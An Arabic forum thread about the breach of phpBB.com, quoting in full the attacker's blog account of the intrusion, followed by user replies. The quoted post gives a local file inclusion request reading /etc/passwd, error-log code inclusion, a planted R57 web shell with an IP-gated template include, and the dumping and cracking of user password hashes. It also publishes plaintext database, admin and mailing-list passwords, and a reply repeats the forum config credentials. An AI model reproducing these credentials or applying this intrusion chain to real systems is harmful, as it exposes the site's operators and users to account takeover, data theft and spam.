النتائج 1 إلى 15 من 15

الموضوع: الموقع الام لـ phpBB مغلق للصيانه

الموقع الام لـ phpBB مغلق للصيانه

السلام عليكم

اليوم وكالعاده دخلت موقع phpBB.com لكن فوجئت بالرساله التاليه:
    Maintenance

We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself.
    You can download phpBB here: http://www.ohloh.net/p/phpbb
    You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb
    – the phpBB team
    فما المشكله ؟

عضو نشيط جدا
    تاريخ التسجيل
    May 2004
    المشاركات

السبب هو اختراق الموقع عن طريق PHPList... المركبة عندهم

والدليل ؟! ...

Hacked PHPBB(dot)COM

It all started on Jan 14th when I was surfing milw0rm and came across this exploit: phpList <= 2.10.8 Local File Inclusion Vulnerability I then remembered that phpbb.com was running PHPlist and went looking through my email to find the link to the script’s location. So I went to phpbb.com/lists and sure enough they were running a vulnerable version. Next I enabled my favorite program proxy program and tried phpbb.com &bull; Maintenance[ConfigFile]=../../../../../../etc/passwd and sure enough it included the etc/passwd

hackedphpbb private pastebin - collaborative debugging tool
    RapidShare: Easy Filehosting

So I moved on to /etc/httpd/conf/httpd.conf
    http://hackedphpbb.pastebin.com/d29d8d4c7

And eventually found my way to their error log /home/logs/phpbb.com/error_log. After a little looking I figured out that their forums were running off /home/virtual/phpbb.com/community/ well it has been known for some time that you can include code in the error log. So I wanted to run some code, well in PHPBB3 the avatars are located in a folder called /home/virtual/home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg

So my first avatar was something simple and I wanted to see if phpbb kept their config file in plain text so cat /home/virtual/phpbb.com/community/config.php and sure enough, its in plain text.
    $dbms = 'mysqli';
    $dbhost = 'phpbb.db.osuosl.org';
    $dbport = '';
    $dbname = 'phpbb';
    $dbuser = 'phpbb2';
    $dbpasswd = 'saxM9nfRjLbJ2Yy5';
    $table_prefix = 'community_';

While I was at it I checked out the config for PHPlist and it was also in plain text:
    $database_host = "localhost";
    $database_name = "phpbb_phplist";
    $database_user = 'phplist';
    $database_password = 'Berti3_Danc3';

So I started running commands and found out that I can upload a php text file on the forums and by finding where the path it was stored I was able to get around their 14kb restrictions on avatars and a lot easier than editing images with edjpgcom. So doing a mysql dump of the phplist_admin table it showed in plain text that the password for the one admin account was phpbb_n3ws and the login was phpBB. Wow I am shocked no one brute forced this. So I login and see what I can come across, wow 400,000 registered emails, I’m sure that will go quick on the black market, sorry people but expect a lot of spam. After trying to modify the files that were stored in PHPlist I gave up and moved on to the forums. But not before dumping the PHPlist emails here: RapidShare: Easy Filehosting

On the phpbb forums it states it has 200,000 members, but due to them constantly getting spammed they have well over 400,000 accounts. I started dumping the community_users table with their user_id, username and user_password. PHPBB stores their user’s passwords in unsalted md5 and their admin’s passwords in some funky hash. But if you run your own forum and are an admin you can have your forums create the hash, and then you do an mysql update to one of the admin account’s and your in. Or if you change their password to yours you can use the recover password function. More to come from this later.

So I wrote a script that submits via curl, the md5 hash to a website and then stores the successful result in my own mysql database. The total accounts cracked are: 28635. I could have continued cracking but it was getting boring. Here is a sql file of the cracked passwords. Warning, some of the user name’s aren’t right as I had to remove ticks and quotes for it to run in my script, so I included their user id so you can check their proper login name.

In gaining access to the admin panel of the forums, I was able to read staff forums and come across some interesting posts. I will share some with you.

List passwords:
    TO try and make this easier, below is a list of the mailing list passwords I had, please update and add any others that you have

captcha-commits@lists.phpbb.com 54a946c47dd434b2
    catdb-commits@lists.phpbb.com 6f543db8f086e11f
    convertors-commits@lists.phpbb.com c192b68baacc8842
    documentation-commits@lists.phpbb.com f85ffcdf9262420c
    easymod-commits@lists.phpbb.com 5db5bf75be85191b
    kbase-commits@lists.phpbb.com 7c843188ed2f6021
    modteam-commits@lists.phpbb.com 533aeefe56bfa30c
    prosilver-commits@lists.phpbb.com 859785a9cc724e03
    website-commits@lists.phpbb.com 3c79b9864ae5ce43
    phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4
    st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa
    iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8
    packagemanager-commits@lists.phpbb.com 81657892dddafdca
    moddocs-commits@lists.phpbb.com 85c837b7f78e5435

Told you they were random Meik

edit by dhn: added website-commits
    edit by tm: added phpbb-honey-commits, st--tool-commits, iit-track-commits.

8kg;rt7Xykjq

That password should work for all mailing lists on code.phpbb.com.
    Emergency contacts and irc info:
    hackedphpbb private pastebin - collaborative debugging tool

And then I remembered that the admin panel allows you to dump tables. So I dumped the users table which is accessible here:

Next I enabled php in template files and added this bit of code to one of the templates:
    $ip=$_SERVER['REMOTE_ADDR']; if($ip == "x.x.x.x"){include("/home/virtual/phpbb.com/community/files/(myid)_82ec9f9eb80df2a16cc3638429631c9f");}

Which happened to be a shell, R57shell actually. I then searched for a writable directory and created a php file and wrote the source code to that file. I cleaned up the template and settings and logs and left the forums to run the way they were.

After searching around using the shell I came across the Blog settings:
    define('DB_NAME', 'wordpress'); // The name of the database
    define('DB_USER', 'blog'); // Your MySQL username
    define('DB_PASSWORD', 'htsCCvyCnt5jPYMx'); // ...and password
    define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
    define('DB_CHARSET', 'utf8');
    define('DB_COLLATE', '');

And now it comes to an end, you may ask why did I do this? For fun mainly, but what I would like to suggest to the team at phpbb is this. If you are going to run third party scripts, either integrate them or keep up to date on their patches. (even though the patch wasn’t released for 2 weeks). Also don’t allow admin’s to recover their passwords, they should have to contact another admin. Another item, doesn’t keep plain text files of passwords or in the database plain text passwords.

I know this isn’t the best read, but it is very hard to look back on everything you did over the course of a few weeks. But hopefully I can now sleep better knowing that I am not worrying about the next way to break in.

Posted by Hacked PHPBB(dot)com at 10:25 AM 0 comments

عضو نشيط جدا
    تاريخ التسجيل
    Aug 2007
    المشاركات

بصراحة اول مرة اشوف منتدى phpbb مخترق !!

على أي حال شكرا لك عالخبر اخوي

4. كارثه بكل المقاييس ولكن كما علمت ان الاختراق تم بسبب اعتمادهم على قائمه بريديه قديمه بها ثغره خطيره ولم يقوموا بترقيعها
    المخترق يستعرض عضلاته في مدونه :
    Hacked PHPBB(dot)COM

عضو فعال
    تاريخ التسجيل
    Oct 2005
    المشاركات

بصراحة اول مرة اشوف منتدى phpbb مخترق !!
    السبب هو اختراق الموقع عن طريق PHPList... المركبة عندهم

موقع لوّن- دروس فوتوشوب-خطوط-ايقونات-قوالب-شعارات-فرش و ستايلات فوتوشوب

6. المنتدى لم يخترق

السكريبت المستخدم فقط تم اختراقه..

> Twitter

7. المنتدى لم يخترق

السكريبت المستخدم فقط تم اختراقه..
    المنتدى تم اختراقه عن طريق السيرفر - راجع مدونه المخترق بها شرح تفصيلي

نعم تم اختراق الخادم عن طريق ثغره في سكربت phplist

9. محتويات ملف الكونفج الخاص بالمنتدى
    $dbms = 'mysqli';
    $dbhost = 'phpbb.db.osuosl.org';
    $dbport = '';
    $dbname = 'phpbb';
    $dbuser = 'phpbb2';
    $dbpasswd = 'saxM9nfRjLbJ2Yy5';
    $table_prefix = 'community_';
    بصراحه امر مؤلم جدا .. لانه قام ايضا بنشر كل ايميلات الاعضاء مع ملف للباسورد الخاص بكل منهم على المشاع . قبل ان تقوم رابيد شير بايقاف الملفات .

نعم عزيزي سيف مسلول للاسف تم ذلك ..

لذا انبه على الجميع تغير كلمة المرور الخاصه بهم المستخدمه في phpBB و مماثلة في مواقع اخرى

احترامي

هى منتدى phpbb باسووردات الاعضاء بتكون مكشوفة ولا md5 ?

السلام عليكم

هى منتدى phpbb باسووردات الاعضاء بتكون مكشوفة ولا md5 ?
    لقد أطلعت على ملف قاعدة البيانات وبحثت عن عضويتي فوجدتها والباس MD5

(( تعليق ))

phpBB3 يستخدم تقنية معقده جدا لكلمات المرور تمنع اي شخص من معرفة الكلمة الحقيقه

على عكس phpBB2 المستخدمه لنظام MD5 وهذا احد اسباب ايقافها

14. phpBB3 يستخدم تقنية معقده جدا لكلمات المرور تمنع اي شخص من معرفة الكلمة الحقيقه

على عكس phpBB2 المستخدمه لنظام MD5 وهذا احد اسباب ايقافها
    على حد مافهمت من النقاش حول هذه النقطه ان منتدى الدعم الخاص بهم كان على phpBB2 قبل ان يقوموا بترقيته الى phpBB3 ولذلك اعتقد ان كل من سجل معهم ابان النظام القديم سيتم كشف باسورد عضويته ، عكس المسجلين في النظام الجديد .

عضو نشيط جدا
    تاريخ التسجيل
    Feb 2004
    المشاركات

خواني بصراحة الموضوع مايحتاج تغيير باسووردات ! المخترق كل همه يوصل رسالته للشركة ووصلها ومن ثم اكيد ببيع القاعده لبعض الشركات الي ترسل رسائل (SPAM) او موردينها ...

يعني لا يطلع لا بعضويتي ولا عضويتك الا اذا كنت من اصحاب الباسوورد الموحد ! فهذه مشكلتك

تحياتي .

ضوابط المشاركة

• لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض